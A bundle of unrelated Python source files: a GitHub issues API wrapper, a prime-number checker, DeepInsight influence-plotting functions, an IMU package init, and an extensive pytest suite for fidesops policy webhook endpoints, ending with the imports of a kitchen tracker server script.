:param str direction: 'asc' or 'desc'
:param datetime since: Date filter (datetime or str in ISO 8601)
:returns: A :doc:`result`
.. note::
Remember :ref:`config precedence`
"""
request = self.make_request('issues.list_by_repo', user=user,
repo=repo)
return self._get_result(request, **params)
def get(self, number, user=None, repo=None):
""" Get a single issue
:param int number: Issue number
:param str user: Username
:param str repo: Repo name
.. note::
Remember :ref:`config precedence`
"""
request = self.make_request('issues.get', user=user, repo=repo,
number=number)
return self._get(request)
def create(self, data, user=None, repo=None):
""" Create an issue
:param dict data: Input. See `github issues doc`_
:param str user: Username
:param str repo: Repo name
.. warning::
You must be authenticated
.. note::
Remember :ref:`config precedence`
::
issues_service.create(dict(title='My test issue',
body='This needs to be fixed ASAP.',
assignee='copitux'))
"""
request = self.make_request('issues.create', user=user, repo=repo,
body=data)
return self._post(request)
def update(self, number, data, user=None, repo=None):
""" Update an issue
:param int number: Issue number
:param dict data: Input. See `github issues doc`_
:param str user: Username
:param str repo: Repo name
.. warning::
You must be authenticated
.. note::
Remember :ref:`config precedence`
"""
request = self.make_request('issues.update', user=user, repo=repo,
number=number, body=data)
return self._patch(request)
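# A usage sketch (hypothetical values; authentication config omitted):
#   issue_service = Issue(user='copitux', repo='python-github3')
#   issue = issue_service.get(1)
#   created = issue_service.create(dict(title='My test issue', body='...'))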
|
def primeNumber(n):
    # Trial division: a composite n must have a divisor no larger than sqrt(n),
    # so checking i while i*i <= n is sufficient.
    if n == 2:
        return True
    if n == 1 or n % 2 == 0:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True
if __name__ == "__main__":
    n = int(input(""))
    if primeNumber(n):
        print(f"{n} is a prime number")
    else:
        print(f"{n} is not a prime number")
|
"""
DeepInsight Toolbox
© Markus Frey
https://github.com/CYHSM/DeepInsight
Licensed under MIT License
"""
import numpy as np
import h5py
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('white')
def plot_frequencies(fp_hdf_out, output_names, aggregator=np.mean, frequency_spacing=1, path_to_save="path_to_save"):
"""
Plots influence plots for each output
    Parameters
    ----------
    fp_hdf_out : str
        File path to HDF5 file
    output_names : list of str
        Names of the model outputs, one subplot per output
    aggregator : function handle, optional
        Which aggregator to use for plotting the lineplots, by default np.mean
    frequency_spacing : int, optional
        Spacing on x axis between frequencies, by default 1
    path_to_save : str, optional
        Base path (without extension) for the CSV files written alongside the plot
    """
fig, axes = plt.subplots(1, len(output_names), figsize=(16, 5))
axes = np.array(axes)
axes = axes.flat
# Read data from HDF5 file
hdf5_file = h5py.File(fp_hdf_out, mode='r')
losses = hdf5_file["analysis/losses"][()]
shuffled_losses = hdf5_file["analysis/influence/shuffled_losses"][()]
frequencies = hdf5_file["inputs/fourier_frequencies"][()].astype(np.float32)
np.savetxt(path_to_save+"_frequencies.csv", frequencies, delimiter=",")
hdf5_file.close()
# Calculate residuals, make sure there is no division by zero by adding small constant. TODO Should be relative to loss
residuals = (shuffled_losses - losses) / (losses + 0.1)
# Plot
for all_residuals, ax, on in zip(residuals.transpose(), axes, output_names):
residuals_mean = np.mean(all_residuals, axis=0)
all_residuals = all_residuals / np.sum(residuals_mean)
df_to_plot = pd.DataFrame(all_residuals).melt()
df_to_plot.to_csv(path_to_save+".csv")
sns.lineplot(x="variable", y="value", data=df_to_plot, ax=ax, estimator=aggregator, ci=68, marker='o',
color='k').set(xlabel='Frequencies (Hz)', ylabel='Frequency Influence (%)')
ax.set_xticks(np.arange(0, len(frequencies), frequency_spacing))
ax.set_xticklabels(np.round(frequencies[0::frequency_spacing], 2), fontsize=8, rotation=45)
ax.set_title(on)
for ax in axes:
ax.invert_xaxis()
sns.despine()
fig.tight_layout()
fig.show()
def plot_channels(fp_hdf_out, output_names, aggregator=np.mean, frequency_spacing=1, channels=None, path_to_save="path_to_save"):
"""
    Plots channel influence plots for each output
    Parameters
    ----------
    fp_hdf_out : str
        File path to HDF5 file
    output_names : list of str
        Names of the model outputs, one subplot per output
    aggregator : function handle, optional
        Which aggregator to use for plotting, by default np.mean
    frequency_spacing : int, optional
        Spacing on x axis between channel ticks, by default 1
    channels : list, optional
        Channel labels used for the x tick labels
    path_to_save : str, optional
        Base path (without extension) for the CSV files written alongside the plot
    """
fig, axes = plt.subplots(1, len(output_names), figsize=(16, 5))
axes = np.array(axes)
axes = axes.flat
# Read data from HDF5 file
hdf5_file = h5py.File(fp_hdf_out, mode='r')
losses = hdf5_file["analysis/losses"][()]
shuffled_losses = hdf5_file["analysis/influence/shuffled_losses"][()]
frequencies = hdf5_file["inputs/fourier_frequencies"][()].astype(np.float32)
np.savetxt(path_to_save+"_frequencies.csv", frequencies, delimiter=",")
hdf5_file.close()
# Calculate residuals, make sure there is no division by zero by adding small constant. TODO Should be relative to loss
residuals = (shuffled_losses - losses) / (losses + 0.1)
# Plot
for all_residuals, ax, on in zip(residuals.transpose(), axes, output_names):
residuals_mean = np.mean(all_residuals, axis=0)
all_residuals = all_residuals / np.sum(residuals_mean)
df_to_plot = pd.DataFrame(all_residuals).melt()
df_to_plot.to_csv(path_to_save+".csv")
sns.barplot(x="variable", y="value", data=df_to_plot, color="salmon", saturation=.25, ax=ax).set(xlabel='Channels', ylabel='Channels Influence (%)')
        ax.set_xticks(np.arange(0, len(channels), frequency_spacing))
ax.set_xticklabels(channels, fontsize=8, rotation=45)
ax.set_title(on)
for ax in axes:
ax.invert_xaxis()
sns.despine()
fig.tight_layout()
fig.show()
|
try:
from importlib_metadata import version # type: ignore
except ImportError:
from importlib.metadata import version # type: ignore
from nxp_imu.I2C import I2C
from nxp_imu.IMU import IMU
__version__ = version("nxp_imu")
__author__ = 'Kevin J. Walchko'
__license__ = 'MIT'
__copyright__ = '2017 Kevin J. Walchko'
|
import json
from typing import Dict
import pytest
from fidesops.api.v1.scope_registry import (
WEBHOOK_READ,
WEBHOOK_CREATE_OR_UPDATE,
POLICY_READ,
WEBHOOK_DELETE,
)
from fidesops.api.v1.urn_registry import (
V1_URL_PREFIX,
POLICY_WEBHOOKS_PRE,
POLICY_WEBHOOKS_POST,
POLICY_PRE_WEBHOOK_DETAIL,
POLICY_POST_WEBHOOK_DETAIL,
)
from fidesops.models.connectionconfig import ConnectionConfig
from fidesops.models.policy import PolicyPreWebhook, PolicyPostWebhook
from tests.api.v1.endpoints.test_privacy_request_endpoints import stringify_date
def embedded_http_connection_config(connection_config: ConnectionConfig) -> Dict:
"""Helper to reduce clutter - a lot of the tests below assert the entire response body, which includes the
https connection config"""
return {
"name": connection_config.name,
"key": connection_config.key,
"connection_type": "https",
"access": connection_config.access.value,
"created_at": stringify_date(connection_config.created_at),
"updated_at": stringify_date(connection_config.updated_at),
"last_test_timestamp": None,
"last_test_succeeded": None,
}
class TestGetPolicyPreExecutionWebhooks:
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key=policy.key)
def test_get_pre_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_pre_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(self, db, api_client, generate_auth_header):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_get_pre_execution_policy_webhooks(
self,
url,
db,
api_client,
generate_auth_header,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"items": [
{
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": policy_pre_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "pre_execution_two_way_webhook",
"name": policy_pre_execution_webhooks[1].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
],
"total": 2,
"page": 1,
"size": 50,
}
class TestGetPolicyPostExecutionWebhooks:
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_POST.format(policy_key=policy.key)
def test_get_post_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_post_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(self, db, api_client, generate_auth_header):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_get_post_execution_policy_webhooks(
self,
url,
db,
api_client,
generate_auth_header,
policy_post_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"items": [
{
"direction": "one_way",
"key": "cache_busting_webhook",
"name": policy_post_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "one_way",
"key": "cleanup_webhook",
"name": policy_post_execution_webhooks[1].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
],
"total": 2,
"page": 1,
"size": 50,
}
class TestGetPolicyPreExecutionWebhookDetail:
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_get_pre_execution_webhook_detail_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_pre_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, policy_pre_execution_webhooks
):
url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key="my_fake_policy",
pre_webhook_key=policy_pre_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_webhook_not_on_policy(
self,
db,
api_client,
generate_auth_header,
erasure_policy,
policy_pre_execution_webhooks,
):
url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=erasure_policy.key,
pre_webhook_key=policy_pre_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No Pre-Execution Webhook found for key 'pre_execution_one_way_webhook' on Policy 'example_erasure_policy'."
)
def test_get_pre_execution_policy_webhook_detail(
self,
url,
db,
api_client,
generate_auth_header,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": policy_pre_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
}
class TestGetPolicyPostExecutionWebhookDetail:
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_get_post_execution_webhook_detail_unauthenticated(self, url, api_client):
resp = api_client.get(url)
assert resp.status_code == 401
def test_get_post_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[POLICY_READ])
resp = api_client.get(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, policy_post_execution_webhooks
):
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key="my_fake_policy",
post_webhook_key=policy_post_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
def test_webhook_not_on_policy(
self,
db,
api_client,
generate_auth_header,
erasure_policy,
policy_post_execution_webhooks,
):
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=erasure_policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No Post-Execution Webhook found for key 'cache_busting_webhook' on Policy 'example_erasure_policy'."
)
def test_get_pre_execution_policy_webhook_detail(
self,
url,
db,
api_client,
generate_auth_header,
policy_post_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.get(url, headers=auth_header)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"direction": "one_way",
"key": "cache_busting_webhook",
"name": policy_post_execution_webhooks[0].name,
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
}
class TestPutPolicyPreExecutionWebhooks:
@pytest.fixture(scope="function")
def valid_webhook_request(self, https_connection_config) -> Dict:
return {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Poke Snowflake Webhook",
"key": "poke_snowflake_webhook",
}
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key=policy.key)
def test_put_pre_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.put(url)
assert resp.status_code == 401
def test_put_pre_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.put(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, valid_webhook_request
):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(url, headers=auth_header, json=[valid_webhook_request])
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_invalid_connection_config(
self, db, url, api_client, generate_auth_header, valid_webhook_request
):
invalid_connection_config_body = {
"connection_config_key": "unknown_connection_key",
"direction": "one_way",
"name": "my_pre_execution_webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, invalid_connection_config_body],
)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No connection configuration found with key 'unknown_connection_key'."
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_direction_error_fails_all(
self,
db,
https_connection_config,
generate_auth_header,
api_client,
url,
valid_webhook_request,
):
invalid_connection_config_body = {
"connection_config_key": https_connection_config.key,
"direction": "invalid_direction",
"name": "my_pre_execution_webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, invalid_connection_config_body],
)
assert resp.status_code == 422
body = json.loads(resp.text)
assert (
body["detail"][0]["msg"]
== "value is not a valid enumeration member; permitted: 'one_way', 'two_way'"
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_put_pre_execution_webhooks_duplicate_keys(
self,
db,
url,
api_client,
generate_auth_header,
valid_webhook_request,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, valid_webhook_request],
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
name_only = {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Poke Snowflake Webhook",
}
resp = api_client.put(
url, headers=auth_header, json=[valid_webhook_request, name_only]
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_put_pre_execution_webhooks_duplicate_names(
self,
db,
url,
api_client,
generate_auth_header,
valid_webhook_request,
https_connection_config,
):
second_payload = valid_webhook_request.copy()
second_payload["key"] = "new_key"
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
        resp = api_client.put(
            url,
            headers=auth_header,
            json=[valid_webhook_request, second_payload],
        )
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
def test_create_multiple_pre_execution_webhooks(
self,
db,
generate_auth_header,
api_client,
url,
valid_webhook_request,
https_connection_config,
):
second_webhook_body = {
"connection_config_key": https_connection_config.key,
"direction": "two_way",
"name": "My Pre Execution Webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, second_webhook_body],
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert len(body) == 2
assert body == [
{
"direction": "one_way",
"key": "poke_snowflake_webhook",
"name": "Poke Snowflake Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "my_pre_execution_webhook",
"name": "My Pre Execution Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
]
pre_webhooks = PolicyPreWebhook.filter(
db=db,
conditions=(
PolicyPreWebhook.key.in_(
["my_pre_execution_webhook", "poke_snowflake_webhook"]
)
),
)
assert pre_webhooks.count() == 2
for webhook in pre_webhooks:
webhook.delete(db=db)
def test_update_webhooks_reorder(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
assert policy_pre_execution_webhooks[0].key == "pre_execution_one_way_webhook"
assert policy_pre_execution_webhooks[0].order == 0
assert policy_pre_execution_webhooks[1].key == "pre_execution_two_way_webhook"
assert policy_pre_execution_webhooks[1].order == 1
# Flip the order in the request
request_body = [
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[1].direction.value,
"name": policy_pre_execution_webhooks[1].name,
"key": policy_pre_execution_webhooks[1].key,
},
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[0].direction.value,
"name": policy_pre_execution_webhooks[0].name,
"key": policy_pre_execution_webhooks[0].key,
},
]
resp = api_client.put(
url,
headers=auth_header,
json=request_body,
)
body = json.loads(resp.text)
assert body[0]["key"] == "pre_execution_two_way_webhook"
assert body[0]["order"] == 0
assert body[1]["key"] == "pre_execution_one_way_webhook"
assert body[1]["order"] == 1
def test_update_hooks_remove_hook_from_request(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
# Only include one hook
request_body = [
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[0].direction.value,
"name": policy_pre_execution_webhooks[0].name,
"key": policy_pre_execution_webhooks[0].key,
},
]
resp = api_client.put(
url,
headers=auth_header,
json=request_body,
)
body = json.loads(resp.text)
assert len(body) == 1 # Other webhook was removed
assert body[0]["key"] == "pre_execution_one_way_webhook"
assert body[0]["order"] == 0
class TestPutPolicyPostExecutionWebhooks:
"""Shares a lot of logic with Pre Execution Webhooks - see TestPutPolicyPreExecutionWebhooks tests"""
@pytest.fixture(scope="function")
def valid_webhook_request(self, https_connection_config) -> Dict:
return {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Clear App Cache",
"key": "clear_app_cache",
}
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_POST.format(policy_key=policy.key)
def test_put_post_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.put(url)
assert resp.status_code == 401
def test_put_post_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.put(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_create_multiple_post_execution_webhooks(
self,
db,
generate_auth_header,
api_client,
url,
valid_webhook_request,
https_connection_config,
):
second_webhook_body = {
"connection_config_key": https_connection_config.key,
"direction": "two_way",
"name": "My Post Execution Webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, second_webhook_body],
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert len(body) == 2
assert body == [
{
"direction": "one_way",
"key": "clear_app_cache",
"name": "Clear App Cache",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "my_post_execution_webhook",
"name": "My Post Execution Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
]
post_webhooks = PolicyPostWebhook.filter(
db=db,
conditions=(
PolicyPostWebhook.key.in_(
["my_post_execution_webhook", "clear_app_cache"]
)
),
)
assert post_webhooks.count() == 2
for webhook in post_webhooks:
webhook.delete(db=db)
class TestPatchPreExecutionPolicyWebhook:
"""Test updating a single PolicyPreWebhook - however, updates to "order" can affect the orders of other webhooks"""
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_patch_pre_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.patch(url)
assert resp.status_code == 401
def test_patch_pre_execution_webhook_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_patch_pre_execution_webhook_invalid_webhook_key(
self, api_client, generate_auth_header, policy
):
        url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
            policy_key=policy.key, pre_webhook_key="invalid_webhook_key"
        )
        auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 404
    def test_patch_pre_execution_webhook_invalid_order(
self, generate_auth_header, api_client, url, policy_pre_execution_webhooks
):
request_body = {"order": 5}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 400
response_body = json.loads(resp.text)
assert (
response_body["detail"]
== "Cannot set order to 5: there are only 2 PolicyPreWebhook(s) defined on this Policy."
)
def test_update_name_only(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
request_body = {"name": "Renaming this webhook"}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": "Renaming this webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
"new_order": [],
}
webhook = PolicyPreWebhook.filter(
db=db, conditions=(PolicyPreWebhook.key == "pre_execution_one_way_webhook")
).first()
assert webhook.order == 0
def test_update_name_and_order(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
request_body = {"name": "Renaming this webhook", "order": 1}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": "Renaming this webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
"new_order": [
{"key": "pre_execution_two_way_webhook", "order": 0},
{"key": "pre_execution_one_way_webhook", "order": 1},
],
}
webhook = PolicyPreWebhook.filter(
db=db, conditions=(PolicyPreWebhook.key == "pre_execution_one_way_webhook")
).first()
db.refresh(webhook)
assert webhook.order == 1
class TestPatchPostExecutionPolicyWebhook:
"""Test updating a single PolicyPostWebhook - however, updates to "order" can affect the orders of other webhooks
This endpoint shares code with the pre-execution PATCH - see TestPatchPreExecutionPolicyWebhook
"""
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_patch_post_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.patch(url)
assert resp.status_code == 401
def test_patch_post_execution_webhook_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_update_name_and_order_and_direction(
self,
db,
generate_auth_header,
api_client,
url,
        policy_post_execution_webhooks,
https_connection_config,
):
webhook = PolicyPostWebhook.filter(
db=db, conditions=(PolicyPostWebhook.key == "cache_busting_webhook")
).first()
db.refresh(webhook)
assert webhook.order == 0
request_body = {
"name": "Better Webhook Name",
"order": 1,
"direction": "two_way",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "two_way",
"key": "cache_busting_webhook",
"name": "Better Webhook Name",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
"new_order": [
{"key": "cleanup_webhook", "order": 0},
{"key": "cache_busting_webhook", "order": 1},
],
}
db.refresh(webhook)
assert webhook.order == 1
class TestDeletePolicyPreWebhook:
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
    def test_delete_pre_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.delete(url)
assert resp.status_code == 401
def test_delete_pre_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_delete_pre_execution_webhook_detail_and_reorder(
self,
url,
api_client,
generate_auth_header,
policy,
policy_pre_execution_webhooks,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_DELETE])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"new_order": [{"key": policy_pre_execution_webhooks[1].key, "order": 0}]
}
assert policy.pre_execution_webhooks.count() == 1
class TestDeletePolicyPostWebhook:
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
    def test_delete_post_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.delete(url)
assert resp.status_code == 401
def test_delete_post_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_delete_post_execution_webhook_detail_and_reorder(
self,
url,
api_client,
generate_auth_header,
policy,
policy_post_execution_webhooks,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_DELETE])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"new_order": [{"key": policy_post_execution_webhooks[1].key, "order": 0}]
}
assert policy.post_execution_webhooks.count() == 1
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[1].key,
)
resp = api_client.delete(
url,
headers=auth_header,
)
body = json.loads(resp.text)
assert body == {"new_order": []}
assert policy.post_execution_webhooks.count() == 0
|
'''*********************************************************************************
SERVER - KITCHEN TRACKER
*********************************************************************************'''
#Import the Modules Required
import os
from pubnub import Pubnub
import datetime
from dateutil.relativedelta import relativedelta
import ConfigParser
import logging
# Modules for the dashDB
import ibm_db
from ibm_db import connect, active
#Importing the Config File and Parsing the file using the ConfigParser
